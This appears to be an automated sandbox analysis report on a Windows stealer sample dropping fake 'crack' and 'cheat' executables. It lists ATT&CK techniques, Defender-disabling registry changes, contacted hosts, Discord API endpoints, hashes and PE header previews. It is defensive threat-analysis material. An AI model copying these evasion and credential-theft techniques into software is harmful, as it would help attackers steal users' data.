Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: Yara match | File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match | File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
MITRE ATT&CK Matrix (number of matched signatures per detected technique in parentheses)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts | Windows Management Instrumentation (1) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (11) | Credential API Hooking (1) | Security Software Discovery (631) | Remote Services | Credential API Hooking (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (1) | Scripting (1) | Scheduled Task/Job (1) | Modify Registry (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (21) | Security Account Manager | Virtualization/Sandbox Evasion (161) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (12) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Bypass User Account Control (1) | Virtualization/Sandbox Evasion (161) | NTDS | System Network Configuration Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Process Injection (11) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (11) | Cached Domain Credentials | System Information Discovery (223) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Timestomp (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Bypass User Account Control (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1545326 | Sample: wKj1CBkbos.exe | Start date: 30/10/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: ip-api.com; fp2e7a.wpc.phicdn.net; 2 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 13 other signatures
  Started: wKj1CBkbos.exe (9)

wKj1CBkbos.exe (9)
  Dropped: C:\Users\user\...\Primordial Crack.exe (PE32); C:\Users\user\AppData\...\52cheatand52rat.exe (PE32); C:\Users\user\...\windows defender.bat (ASCII)
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Creates files with lurking names (e.g. Crack.exe)
  Started: cmd.exe (13); Primordial Crack.exe (16); 52cheatand52rat.exe (19)

cmd.exe (13)
  Signatures: Uses cmd line tools excessively to alter registry or file data; Uses schtasks.exe or at.exe to add and modify task schedules
  Started: reg.exe (22); reg.exe (25); reg.exe (27); 18 other processes

Primordial Crack.exe (16)
  Dropped: C:\Users\user\AppData\...\Lunch LaCheatV2.exe (PE32)
  Started: cmd.exe (29); Lunch LaCheatV2.exe (31)

52cheatand52rat.exe (19)
  DNS/IP: ip-api.com 208.95.112.1, ports 49711, 49758, 80, TUT-AS United States
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: WMIC.exe (34)

reg.exe (22)
  Signatures: Disables Windows Defender (deletes autostart); Disable Windows Defender real time protection (registry)

cmd.exe (29)
  Signatures: Uses cmd line tools excessively to alter registry or file data
  Started: reg.exe (38); reg.exe (41); reg.exe (43); 12 other processes

Lunch LaCheatV2.exe (31)
  Dropped: C:\Users\user\AppData\...\Lunch LaCheat.exe (PE32)
  Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Hides threads from debuggers

WMIC.exe (34)
  Started: conhost.exe (45)

reg.exe (38)
  Signatures: Disables Windows Defender (deletes autostart); Disable Windows Defender real time protection (registry)

Source | Detection | Scanner | Label
wKj1CBkbos.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.Umbral
wKj1CBkbos.exe | 100% | Avira | TR/Crypt.XPACK.Gen
wKj1CBkbos.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | 84% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | 83% | ReversingLabs | Win32.Trojan.Vindor
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | 75% | ReversingLabs | Win32.Trojan.Vindor
C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | 92% | ReversingLabs | Win32.Trojan.Dorv
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label
http://crl.microsoft | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/Blank-c/Umbral-Stealer | 52cheatand52rat.exe.0.dr | false | | unknown
https://discord.com/api/v10/users/ | 52cheatand52rat.exe.0.dr | false | | unknown
http://crl.microsoft | 52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/?fields=225545 | wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | false | | unknown
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | false | | unknown
https://discordapp.com/api/v9/users/ | wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr | false | | unknown
http://ip-api.com | 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545326
Start date and time: 2024-10-30 12:36:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: wKj1CBkbos.exe (renamed because the original name is a hash value)
Original Sample Name: E3A480A53D8B2C398A7642E1F4E84785.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@113/6@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 31
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 142.250.74.195, 20.109.210.53, 13.95.31.18
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, gstatic.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target 52cheatand52rat.exe, PID 4420 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: wKj1CBkbos.exe
Time | Type | Description
07:37:05 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
07:37:07 | API Interceptor | 1x Sleep call for process: 52cheatand52rat.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | skuld3.exe | malicious | Skuld Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | file.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | bLaLoo4ET5.exe | malicious | Quasar | ip-api.com/json/
208.95.112.1 | sipari_.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Transferencia.doc | malicious | Quasar | ip-api.com/json/
208.95.112.1 | SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | ip-api.com/json
208.95.112.1 | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | skuld3.exe | malicious | Skuld Stealer | 208.95.112.1
ip-api.com | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | 208.95.112.1
ip-api.com | file.exe | malicious | WhiteSnake Stealer | 208.95.112.1
ip-api.com | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | bLaLoo4ET5.exe | malicious | Quasar | 208.95.112.1
ip-api.com | sipari_.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Transferencia.doc | malicious | Quasar | 208.95.112.1
ip-api.com | https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/ | malicious | Unknown | 51.195.5.58
ip-api.com | SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
fp2e7a.wpc.phicdn.net | https://storage.googleapis.com/inbound-mail-attachments-prod/5e015eec-2063-4653-b543-a2fdc4c2725e?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=Oqe%2BJFHcrdG7YCkrE3C6Zz6OLCYLhBuVvPPylkjCYGmey41qx66XjqVVSGCLAMzo5SzdjLX9iaWGDKggE5%2BSVyTp%2B4Pp9hiCYEhCbzJzRObttu74xvBHPG1HUvGwyhKfE3KbJMo6s3eIKayqjRRl9ive1ntsdNaFkXskMlbkDDitCjrgmc09BMh3GNgCZmS%2B%2F6W4Hs1%2FBX1s3JEpbIGaBotrI7KKcK%2Bk0eqEvy1FwgCCaSUDTZl1b6RyonBWqWQVoOT9UDFVSH5CfVKF4DfFfka0acdeYb2Y34WyRy8cCZlWDImJo52Hcg2wugU%2BJragJQbGJ2SdK6G4yy3Ak%2BGX%2FQ%3D%3D | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://storage.googleapis.com/inbound-mail-attachments-prod/e5020188-2749-47cf-83bf-a0b2cfddec50?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=IYvTnHOaJB29ajuWwRzQZcQU4rHZgE4%2B0wJhDBuFNmuqKnq%2FuPwCZP2MuJNgfzc77Ulb%2FJD3hwjlmSZShLzm0rPz6kKzhOLxOsUrI2XaeGtr6VKv39d0yW57ZIaLvLuZqvMWrfmHg%2BzUtv%2BcuDdwfra8VzLrHRqbhPzwLmtaXc5jZiVHr4MEAQCaBOGAv%2B6DE6yQ7c%2FlukBVx7jSavZDJXhjDk6sOF%2BQSM%2FK%2FuwwWji%2BW4LjRMFJenK4rl5ERz3yHGgV62NnKzG9uQEgFU1Iv%2B0bvdTtYnW7CWjAkQzlPAI6yDTeVaqoZiiX%2FlEIegTw1eda8%2FOtpMB8OmgtqhxecQ%3D%3D | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://draxcc.com/ | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | http://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.com | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://volmesappliant.com/postback?cid=%7Bcid%7D&payout=payout&currency=OPTIONAL&txid=txid&et=ftd | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.com | malicious | HTMLPhisher | 192.229.221.95
fp2e7a.wpc.phicdn.net | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://trvelocity.petra-dee.org/index.php/campaigns/ao946pbrfq631/track-url/lk782m0eyna84/24e9f9ecc31181de7c43e9793836ee263a7fcd94%20%20office365_event_type%20alert | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | DHL TRACKING.exe | malicious | FormBook | 192.229.221.95
fp2e7a.wpc.phicdn.net | O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | 192.229.221.95
bg.microsoft.map.fastly.net | https://storage.googleapis.com/inbound-mail-attachments-prod/5e015eec-2063-4653-b543-a2fdc4c2725e?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=Oqe%2BJFHcrdG7YCkrE3C6Zz6OLCYLhBuVvPPylkjCYGmey41qx66XjqVVSGCLAMzo5SzdjLX9iaWGDKggE5%2BSVyTp%2B4Pp9hiCYEhCbzJzRObttu74xvBHPG1HUvGwyhKfE3KbJMo6s3eIKayqjRRl9ive1ntsdNaFkXskMlbkDDitCjrgmc09BMh3GNgCZmS%2B%2F6W4Hs1%2FBX1s3JEpbIGaBotrI7KKcK%2Bk0eqEvy1FwgCCaSUDTZl1b6RyonBWqWQVoOT9UDFVSH5CfVKF4DfFfka0acdeYb2Y34WyRy8cCZlWDImJo52Hcg2wugU%2BJragJQbGJ2SdK6G4yy3Ak%2BGX%2FQ%3D%3D | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://storage.googleapis.com/inbound-mail-attachments-prod/e5020188-2749-47cf-83bf-a0b2cfddec50?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=IYvTnHOaJB29ajuWwRzQZcQU4rHZgE4%2B0wJhDBuFNmuqKnq%2FuPwCZP2MuJNgfzc77Ulb%2FJD3hwjlmSZShLzm0rPz6kKzhOLxOsUrI2XaeGtr6VKv39d0yW57ZIaLvLuZqvMWrfmHg%2BzUtv%2BcuDdwfra8VzLrHRqbhPzwLmtaXc5jZiVHr4MEAQCaBOGAv%2B6DE6yQ7c%2FlukBVx7jSavZDJXhjDk6sOF%2BQSM%2FK%2FuwwWji%2BW4LjRMFJenK4rl5ERz3yHGgV62NnKzG9uQEgFU1Iv%2B0bvdTtYnW7CWjAkQzlPAI6yDTeVaqoZiiX%2FlEIegTw1eda8%2FOtpMB8OmgtqhxecQ%3D%3D | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 401K .pdf | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | Biocon-In-Service Agreement.pdf | malicious | EvilProxy, HTMLPhisher | 199.232.214.172
bg.microsoft.map.fastly.net | https://draxcc.com/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | http://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.com | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 98761598741965.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.com | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | z1Transaction_ID_REF2418_cmd.bat | malicious | AgentTesla, DBatLoader, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | Orden de Compra.xlam.xlsx | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUT-ASUS | skuld3.exe | malicious | Skuld Stealer | 208.95.112.1
TUT-ASUS | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | 208.95.112.1
TUT-ASUS | file.exe | malicious | WhiteSnake Stealer | 208.95.112.1
TUT-ASUS | Comprobante de pago.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | O3o5Xzk5Wd.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | bLaLoo4ET5.exe | malicious | Quasar | 208.95.112.1
TUT-ASUS | sipari_.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Transferencia.doc | malicious | Quasar | 208.95.112.1
TUT-ASUS | SecuriteInfo.com.FileRepMalware.22561.28030.exe | malicious | Python Stealer, Exela Stealer | 208.95.112.1
TUT-ASUS | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 208.95.112.1
                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | FixTsDfhiC.exe | malicious | Blank Grabber, DCRat, Umbral Stealer
Process: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
File Type: CSV text
Category: dropped
Size (bytes): 1492
Entropy (8bit): 5.3787668257697945
Encrypted: false
SSDEEP: 24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
MD5: 761D1106534DF52590D691CAD8962C57
SHA1: D3678D8F8635FF85D354F7EE2FFC24008357DC5B
SHA-256: 73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
SHA-512: AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
Malicious: false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):235008
                                                  Entropy (8bit):6.052066943195521
                                                  Encrypted:false
                                                  SSDEEP:6144:tloZM+rIkd8g+EtXHkv/iD4OUCKbhS6FOAxDeebn4b8e1mSTi:voZtL+EP8OUCKbhS6FOAxDeebAo
                                                  MD5:06129FFC46E854930CFCAA754CA1D487
                                                  SHA1:E7C173C48AA107EC63BD6F9030C9EC6FE889D832
                                                  SHA-256:10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
                                                  SHA-512:B7121A2A65F317EDBC1B4DD8DEC427C277FAD2B521A211D1408BC06B79431C418DAD32ED61481C5EF49511CD167846E026A86147AE77BD9B0E607918FEB66AB9
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 84%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................@...K.......P...........................$................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                                  Process:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):7888384
                                                  Entropy (8bit):7.978075960572594
                                                  Encrypted:false
                                                  SSDEEP:196608:i9FITY7Wgr4pQTsRB/DejGIKpj57IOTj0cnue:4FN96LRB/DejGHtIOTofe
                                                  MD5:B76057DF968A944446F950DD4DDC6AEC
                                                  SHA1:BB64DE1C677368764000D34C29528EAD2F48405C
                                                  SHA-256:AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
                                                  SHA-512:7F45198FE05013CEAB477784BDE2B1C4532607BD8BA8D9CFB09C5BB037DD2616086C8CB3AFD669B24EC89EEDBD270D00F1BD6BCE2644B40ED36B8F32FC5FDB31
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................r.......|K......0....@..........................0O..................@.................../.O....6..............................................................45.......................G.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0....J..........................`..`.vmp1....Xx......Zx.................`..`.....................................................................................................................................................$..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):13304832
                                                  Entropy (8bit):7.991054831548809
                                                  Encrypted:true
                                                  SSDEEP:393216:aJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8:abQpgssCKInwjJaM
                                                  MD5:7DB5128F7A81CC1AF094D8898E79FF21
                                                  SHA1:D503984331D5999C14931C267D859FBD1510C282
                                                  SHA-256:2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
                                                  SHA-512:CACEEC284B71DF124D47267E5CA42BF84E558AA9606B0186F132FBA8D2BEAD2DDBD9304CD82761270B6C42271E0937AEFF605EF5D865C424CC29B39CA05B123A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*......................x.....l.q......0....@...........................v..................@......................O...t.t......pv.P7....................................................n.......................r.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0...............................`..`.vmp1...0...........................`..`.rsrc...P7...pv..8..................@..P.............................................................................................................$..............@..P........................................................................................................................................
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):13317632
                                                  Entropy (8bit):7.99074200508439
                                                  Encrypted:true
                                                  SSDEEP:393216:2JlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8X:2bQpgssCKInwjJaMc
                                                  MD5:BBD6FFDB33259778F08704696A04891F
